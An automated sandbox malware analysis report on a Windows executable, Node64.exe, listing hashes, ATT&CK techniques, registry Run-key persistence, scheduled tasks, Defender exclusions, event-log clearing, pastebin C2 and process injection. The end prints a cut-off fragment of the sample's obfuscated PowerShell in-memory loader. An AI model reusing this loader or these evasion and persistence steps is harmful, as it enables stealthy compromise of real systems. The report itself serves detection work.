bd7a853e20ec918539038278bb788fea3314d1da09e7f75608d13a8cd2436362

Analysis

max time kernel
150s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
17-11-2024 17:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmpfile-main/Node64.exe
Size

368KB
MD5

47fe2649cc2325a477fce08731aeb716
SHA1

268abf2cceac62263fe040dc40b8b4b9aa3592da
SHA256

d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b
SHA512

173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4
SSDEEP

6144:dClTCNaC5liBrWdzoRQJx9LDmaAF5kDERQp+QDN9gkHp683KX:dUolitMIaAFkh6

Score

10^/10

defense_evasion discovery execution persistence

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description	pid	Process	procid_target
PID 4980 created 632	4980	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE

pid	Process
3108	powershell.exe
4684	powershell.exe
2404	powershell.exe
4980	powershell.EXE

Executes dropped EXE 3 IoCs

Processes:

$Node32.exe$Node2Json.exe$Node3Json.exe

pid	Process
420	$Node32.exe
1468	$Node2Json.exe
3580	$Node3Json.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Node64.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe"	Node64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe"	Node64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe"	Node64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
1	pastebin.com
4	pastebin.com
5	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	ip-api.com

Drops file in System32 directory 9 IoCs

Processes:

Node64.exepowershell.EXEOfficeClickToRun.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\$Node32.exe	Node64.exe
File created	C:\Windows\System32\$Node3Json.exe	Node64.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\System32\$Node32.exe	Node64.exe
File opened for modification	C:\Windows\System32\$Node2Json.exe	Node64.exe
File opened for modification	C:\Windows\System32\$Node3Json.exe	Node64.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\System32\$Node2Json.exe	Node64.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description	pid	Process	procid_target
PID 4980 set thread context of 3384	4980	powershell.EXE	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

$Node32.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$Node32.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 55 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1731864305"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 17 Nov 2024 17:25:07 GMT"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={393F379E-9243-4876-8596-E774536AC1F1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
4112	schtasks.exe
2376	schtasks.exe
748	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exe

pid	Process
3108	powershell.exe
3108	powershell.exe
4684	powershell.exe
4684	powershell.exe
2404	powershell.exe
2404	powershell.exe
4980	powershell.EXE
4980	powershell.EXE
4980	powershell.EXE
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe
3384	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Node64.exepowershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exe$Node2Json.exe$Node3Json.exeExplorer.EXEsvchost.exewmiprvse.exesvchost.exesvchost.exe

description	pid	Process
Token: SeDebugPrivilege	3076	Node64.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	4980	powershell.EXE
Token: SeDebugPrivilege	4980	powershell.EXE
Token: SeDebugPrivilege	3384	dllhost.exe
Token: SeDebugPrivilege	1468	$Node2Json.exe
Token: SeDebugPrivilege	3580	$Node3Json.exe
Token: SeShutdownPrivilege	3324	Explorer.EXE
Token: SeCreatePagefilePrivilege	3324	Explorer.EXE
Token: SeShutdownPrivilege	3324	Explorer.EXE
Token: SeCreatePagefilePrivilege	3324	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2668	svchost.exe
Token: SeIncreaseQuotaPrivilege	2668	svchost.exe
Token: SeSecurityPrivilege	2668	svchost.exe
Token: SeTakeOwnershipPrivilege	2668	svchost.exe
Token: SeLoadDriverPrivilege	2668	svchost.exe
Token: SeSystemtimePrivilege	2668	svchost.exe
Token: SeBackupPrivilege	2668	svchost.exe
Token: SeRestorePrivilege	2668	svchost.exe
Token: SeShutdownPrivilege	2668	svchost.exe
Token: SeSystemEnvironmentPrivilege	2668	svchost.exe
Token: SeUndockPrivilege	2668	svchost.exe
Token: SeManageVolumePrivilege	2668	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2668	svchost.exe
Token: SeIncreaseQuotaPrivilege	2668	svchost.exe
Token: SeSecurityPrivilege	2668	svchost.exe
Token: SeTakeOwnershipPrivilege	2668	svchost.exe
Token: SeLoadDriverPrivilege	2668	svchost.exe
Token: SeSystemtimePrivilege	2668	svchost.exe
Token: SeBackupPrivilege	2668	svchost.exe
Token: SeRestorePrivilege	2668	svchost.exe
Token: SeShutdownPrivilege	2668	svchost.exe
Token: SeSystemEnvironmentPrivilege	2668	svchost.exe
Token: SeUndockPrivilege	2668	svchost.exe
Token: SeManageVolumePrivilege	2668	svchost.exe
Token: SeDebugPrivilege	4432	wmiprvse.exe
Token: SeAuditPrivilege	2252	svchost.exe
Token: SeAuditPrivilege	2612	svchost.exe
Token: SeAuditPrivilege	2612	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2668	svchost.exe
Token: SeIncreaseQuotaPrivilege	2668	svchost.exe
Token: SeSecurityPrivilege	2668	svchost.exe
Token: SeTakeOwnershipPrivilege	2668	svchost.exe
Token: SeLoadDriverPrivilege	2668	svchost.exe
Token: SeSystemtimePrivilege	2668	svchost.exe
Token: SeBackupPrivilege	2668	svchost.exe
Token: SeRestorePrivilege	2668	svchost.exe
Token: SeShutdownPrivilege	2668	svchost.exe
Token: SeSystemEnvironmentPrivilege	2668	svchost.exe
Token: SeUndockPrivilege	2668	svchost.exe
Token: SeManageVolumePrivilege	2668	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2668	svchost.exe
Token: SeIncreaseQuotaPrivilege	2668	svchost.exe
Token: SeSecurityPrivilege	2668	svchost.exe
Token: SeTakeOwnershipPrivilege	2668	svchost.exe
Token: SeLoadDriverPrivilege	2668	svchost.exe
Token: SeSystemtimePrivilege	2668	svchost.exe
Token: SeBackupPrivilege	2668	svchost.exe
Token: SeRestorePrivilege	2668	svchost.exe
Token: SeShutdownPrivilege	2668	svchost.exe
Token: SeSystemEnvironmentPrivilege	2668	svchost.exe
Token: SeUndockPrivilege	2668	svchost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
3324	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Node64.exepowershell.EXEdllhost.exe

description	pid	Process	procid_target
PID 3076 wrote to memory of 3108	3076	Node64.exe	81
PID 3076 wrote to memory of 3108	3076	Node64.exe	81
PID 3076 wrote to memory of 4112	3076	Node64.exe	83
PID 3076 wrote to memory of 4112	3076	Node64.exe	83
PID 3076 wrote to memory of 420	3076	Node64.exe	85
PID 3076 wrote to memory of 420	3076	Node64.exe	85
PID 3076 wrote to memory of 420	3076	Node64.exe	85
PID 3076 wrote to memory of 4684	3076	Node64.exe	86
PID 3076 wrote to memory of 4684	3076	Node64.exe	86
PID 3076 wrote to memory of 2376	3076	Node64.exe	90
PID 3076 wrote to memory of 2376	3076	Node64.exe	90
PID 3076 wrote to memory of 1468	3076	Node64.exe	92
PID 3076 wrote to memory of 1468	3076	Node64.exe	92
PID 3076 wrote to memory of 2404	3076	Node64.exe	93
PID 3076 wrote to memory of 2404	3076	Node64.exe	93
PID 3076 wrote to memory of 748	3076	Node64.exe	95
PID 3076 wrote to memory of 748	3076	Node64.exe	95
PID 3076 wrote to memory of 3580	3076	Node64.exe	97
PID 3076 wrote to memory of 3580	3076	Node64.exe	97
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 4980 wrote to memory of 3384	4980	powershell.EXE	98
PID 3384 wrote to memory of 632	3384	dllhost.exe	5
PID 3384 wrote to memory of 704	3384	dllhost.exe	7
PID 3384 wrote to memory of 1008	3384	dllhost.exe	12
PID 3384 wrote to memory of 424	3384	dllhost.exe	13
PID 3384 wrote to memory of 732	3384	dllhost.exe	14
PID 3384 wrote to memory of 836	3384	dllhost.exe	15
PID 3384 wrote to memory of 1072	3384	dllhost.exe	16
PID 3384 wrote to memory of 1088	3384	dllhost.exe	17
PID 3384 wrote to memory of 1224	3384	dllhost.exe	19
PID 3384 wrote to memory of 1236	3384	dllhost.exe	20
PID 3384 wrote to memory of 1284	3384	dllhost.exe	21
PID 3384 wrote to memory of 1296	3384	dllhost.exe	22
PID 3384 wrote to memory of 1424	3384	dllhost.exe	23
PID 3384 wrote to memory of 1456	3384	dllhost.exe	24
PID 3384 wrote to memory of 1504	3384	dllhost.exe	25
PID 3384 wrote to memory of 1524	3384	dllhost.exe	26
PID 3384 wrote to memory of 1544	3384	dllhost.exe	27
PID 3384 wrote to memory of 1720	3384	dllhost.exe	28
PID 3384 wrote to memory of 1768	3384	dllhost.exe	29
PID 3384 wrote to memory of 1792	3384	dllhost.exe	30
PID 3384 wrote to memory of 1832	3384	dllhost.exe	31
PID 3384 wrote to memory of 1892	3384	dllhost.exe	32
PID 3384 wrote to memory of 1900	3384	dllhost.exe	33
PID 3384 wrote to memory of 1920	3384	dllhost.exe	34
PID 3384 wrote to memory of 2032	3384	dllhost.exe	35
PID 3384 wrote to memory of 2044	3384	dllhost.exe	36
PID 3384 wrote to memory of 2124	3384	dllhost.exe	37
PID 3384 wrote to memory of 2252	3384	dllhost.exe	39
PID 3384 wrote to memory of 2432	3384	dllhost.exe	40
PID 3384 wrote to memory of 2440	3384	dllhost.exe	41
PID 3384 wrote to memory of 2504	3384	dllhost.exe	42
PID 3384 wrote to memory of 2612	3384	dllhost.exe	43
PID 3384 wrote to memory of 2620	3384	dllhost.exe	44
PID 3384 wrote to memory of 2628	3384	dllhost.exe	45
PID 3384 wrote to memory of 2652	3384	dllhost.exe	46
PID 3384 wrote to memory of 2668	3384	dllhost.exe	47
PID 3384 wrote to memory of 2696	3384	dllhost.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:424
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d65c55ff-f42b-4cfa-832d-d00b339c683a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3384

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uUhGOiFnIsYL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WMgzxrANKcpRPC,[Parameter(Position=1)][Type]$gnJCEHBpaX)$ZjXUCuGMLGN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+'l'+[Char](101)+'c'+'t'+''+[Char](101)+'dD'+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+''+'T'+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$ZjXUCuGMLGN.DefineConstructor('R'+[Char](84)+'Sp'+'e'+''+[Char](99)+''+'i'+'a'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e'+','+'Hid'+[Char](101)+''+'B'+''+[Char](121)+''+'S'+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$WMgzxrANKcpRPC).SetImplementationFlags('Run'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$ZjXUCuGMLGN.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+'k'+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot,'+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$gnJCEHBpaX,$WMgzxrANKcpRPC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ZjXUCuGMLGN.CreateType();}$KqxHmocLDfROj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+'ft'+[Char](46)+''+[Char](87)+'i'+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ttXBfgwKaDGfzt=$KqxHmocLDfROj.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Proc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MiczOqSgzdZJKvWLGyl=uUhGOiFnIsYL @([String])([IntPtr]);$QLnNtOWEbaGrXIzwfgOrsK=uUhGOiFnIsYL 